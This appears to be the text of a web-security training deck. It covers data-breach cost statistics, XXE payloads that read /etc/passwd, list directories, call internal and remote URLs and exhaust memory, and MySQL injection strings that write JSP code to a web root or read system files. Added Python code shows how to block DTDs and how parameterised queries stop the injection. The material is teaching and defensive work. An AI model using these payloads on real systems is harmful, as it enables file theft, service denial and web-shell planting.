AGENDA
1. Theory.
   1. Ponemon IBM report keynotes.
   2. OWASP.
2. Practice.
   1. XXE attack vector demo.
   2. XXE in detail. How to fix it.
   3. WebGoat overview. Demo.
   4. SQL injection. Injection points.
   5. JS MITM. Anonymous proxies.
3. Vulnerabilities database. How to scan your project.
4. Best practices for team and company.
IBM and Ponemon Institute are pleased to release the 2016 Cost of Data Breach Study: Global Analysis.
Ponemon Institute:
• provides strategic consulting to private and public sector organizations interested in establishing or enhancing their privacy, data protection, and security practices.
• conducts independent research on privacy, data protection and information security policy.
The average per capita cost of data breach over three years, expressed in US dollars, for the 12 country studies.
The total average cost of a data breach for the 12 countries in this year's study, US$ millions.
PONEMON REPORT SUMMARY
According to the research, the average total cost of a data breach for the 383 companies participating increased from $3.79 million to $4 million.
The average cost paid for each lost or stolen record containing sensitive and confidential information increased from $154 in 2015 to $158 in this year's study.
• 383 companies in 12 countries
• $4 million is the average total cost of a data breach
• 29% increase in total cost of a data breach since 2013
• $158 is the average cost per lost or stolen record
• 15% increase in per capita cost since 2013
Local resource call with private IP (parameter entity):
<?xml version="1.0"?>
<!DOCTYPE company [
<!ENTITY % xxe SYSTEM "http://127.0.0.1:8889">
%xxe;]>

Get local file content:
<?xml version="1.0"?>
<!DOCTYPE order [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>

Random generator OOM (parser blocks on an endless stream and exhausts memory):
<?xml version="1.0"?>
<!DOCTYPE order [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///dev/random" >
]>
Local FS scan (directory listing):
<?xml version="1.0"?>
<!DOCTYPE company [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/" >
]>

Remote resource call:
<?xml version="1.0"?>
<!DOCTYPE company [
<!ELEMENT text (#PCDATA)>
<!ENTITY xxe SYSTEM "http://www.site.com/lohika.txt">
]>
The eXtensible Markup Language (XML)
eXploitable Markup Language
Extensible Markup Language, abbreviated XML, describes a class of data objects called XML documents and partially describes the behavior of computer programs which process them. XML is an application profile or restricted form of SGML, the Standard Generalized Markup Language [ISO 8879]. By construction, XML documents are conforming SGML documents.
XML documents are made up of storage units called entities, which contain either parsed or unparsed data. Parsed data is made up of characters, some of which form character data, and some of which form markup. Markup encodes a description of the document's storage layout and logical structure. XML provides a mechanism to impose constraints on the storage layout and logical structure.
[Definition: A software module called an XML processor is used to read XML documents and provide access to their content and structure.] [Definition: It is assumed that an XML processor is doing its work on behalf of another module, called the application.] This specification describes the required behavior of an XML processor in terms of how it must read XML data and the information it must provide to the application.
<, %, >, null-byte
no binary (must be UTF-8/16 data)
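Every payload on the two XXE slides above needs a DOCTYPE to declare its entity, so the fix the agenda promises ("XXE in detail. How to fix it") is to refuse the DTD before any entity can be declared. The following is an added example, not code from the slides, from OWASP or from WebGoat: a Python 3 intake function built on the standard library's expat bindings that rejects any DOCTYPE, never processes parameter entities, and refuses external entity references. It assumes the application's own documents never need a DTD. The sample documents are constructed here; the two DOCTYPE declarations are copied from the slides, the element bodies are ours.

```python
"""Hardened XML intake: refuse any DOCTYPE so no entity (internal,
external, or parameter) can ever be declared or expanded."""
import xml.parsers.expat as expat


class DtdNotAllowed(ValueError):
    """Raised when an untrusted document carries a DOCTYPE declaration."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an untrusted source and return {element path: text}.

    Mitigations, in order of importance:
      1. a DOCTYPE is rejected outright (our own documents never carry one);
      2. parameter entities (the "%xxe;" form) are never processed;
      3. an external entity reference that somehow slips through is refused.
    """
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.buffer_text = True  # deliver each text node in a single callback

    fields: dict = {}
    path: list = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at "<!DOCTYPE ... [" before the internal subset is read,
        # so no ENTITY declaration inside it is ever processed.
        raise DtdNotAllowed(f"DOCTYPE {name!r} is not accepted from untrusted input")

    def refuse_external_entity(context, base, sysid, pubid):
        return 0  # returning non-zero would let expat try to resolve it

    def start_element(name, attrs):
        path.append(name)

    def char_data(text):
        if text.strip():  # ignore indentation-only whitespace
            key = "/".join(path)
            fields[key] = fields.get(key, "") + text

    def end_element(name):
        path.pop()

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = refuse_external_entity
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data
    parser.EndElementHandler = end_element

    parser.Parse(data, True)
    return fields


def is_rejected(data: bytes) -> bool:
    """True when the hardened parser refuses the document because of a DTD."""
    try:
        parse_untrusted_xml(data)
    except DtdNotAllowed:
        return True
    return False


# Constructed sample inputs (not from the slides, except the two DOCTYPEs).
BENIGN_ORDER = b'<?xml version="1.0"?><order><item>widget</item><qty>2</qty></order>'

FILE_ENTITY_ORDER = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>'
    b'<order/>'
)

PARAM_ENTITY_COMPANY = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE company [<!ENTITY % xxe SYSTEM "http://127.0.0.1:8889">%xxe;]>'
    b'<company/>'
)

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN_ORDER))
    for doc in (FILE_ENTITY_ORDER, PARAM_ENTITY_COMPANY):
        print("rejected:", is_rejected(doc))
```

The same rule applies to the Java stack WebGoat runs on: setting the parser feature http://apache.org/xml/features/disallow-doctype-decl to true on a JAXP DocumentBuilderFactory or SAXParserFactory makes every DOCTYPE a parse error, which neutralises all five payloads above at once rather than trying to block individual URI schemes.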
Write into a file:
1 LIMIT 1 into OUTFILE '/var/www/root/test.jsp' FIELDS ENCLOSED BY '/' LINES TERMINATED BY '\n<%jsp code here%>';
Results are stored in a file with rw-rw-rw permissions owned by the MySQL user and group.
/var/www/root/test.jsp will then contain:
/field values/
<%jsp code here%>

Read from a file:
load_file('filename')
load_file is a native function that can read a file when the file system permissions allow it. If the connected user has the FILE privilege, it can be used to get a file's content.
select load_file('/etc/passwd');

Out-of-band SQL injection
Out-of-band injection can be accomplished by using the 'into outfile' clause.
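The injection point on this slide is a numeric id that the application glues into its SQL text, which is what lets "1 LIMIT 1 into OUTFILE ..." become part of the statement. As an added example (not code from the slides or from WebGoat), here is the same lookup written both ways in Python 3: the concatenating version, shown only as query text, carries the slide's payload into the SQL verbatim, while the validating, parameterised version never lets the input touch the SQL at all. SQLite's stdlib driver stands in for MySQL (an assumption; SQLite has no INTO OUTFILE), so the point demonstrated is the query construction, not the file write. The products table and the payload constant are constructed here.

```python
"""Parameterised lookup versus string concatenation, using the slide's
INTO OUTFILE injection string as the untrusted input."""
import sqlite3

# The injection string from the slide, as a web app would receive it in
# place of a product id.
OUTFILE_PAYLOAD = (
    "1 LIMIT 1 into OUTFILE '/var/www/root/test.jsp' FIELDS ENCLOSED BY '/' "
    "LINES TERMINATED BY '\\n<%jsp code here%>'"
)


def build_query_vulnerable(product_id: str) -> str:
    """Concatenation: whatever the user typed becomes SQL text.

    Only the query string is built here; on MySQL with the FILE privilege
    this is exactly the statement that writes the attacker's file.
    """
    return f"SELECT name FROM products WHERE id = {product_id}"


def payload_reaches_sql(product_id: str) -> bool:
    """Does the concatenated statement carry an INTO OUTFILE clause?"""
    return "INTO OUTFILE" in build_query_vulnerable(product_id).upper()


def lookup_safe(conn: sqlite3.Connection, product_id: str):
    """Validate the type, then bind: the input is data, never SQL.

    Returns the product name, or None when the id is absent or malformed.
    """
    if not product_id.isdigit():
        return None  # reject instead of trying to sanitise
    row = conn.execute(
        "SELECT name FROM products WHERE id = ?", (int(product_id),)
    ).fetchone()
    return row[0] if row else None


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's products table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO products VALUES (1, 'widget'), (2, 'gadget')")
    conn.commit()
    return conn


if __name__ == "__main__":
    print(build_query_vulnerable(OUTFILE_PAYLOAD))
    print("payload in SQL text:", payload_reaches_sql(OUTFILE_PAYLOAD))
    db = demo_db()
    print("safe lookup '1':", lookup_safe(db, "1"))
    print("safe lookup payload:", lookup_safe(db, OUTFILE_PAYLOAD))
```

Parameterisation removes the injection point; the file-write capability itself is a server-side privilege, so on MySQL the database-side controls are to revoke FILE from the application account (it is a global privilege, never needed by a web app) and to set secure_file_priv, which restricts where INTO OUTFILE and load_file may operate. Both are visible in the slides' own terms: without FILE, neither the write nor the load_file read succeeds even when the query is injected.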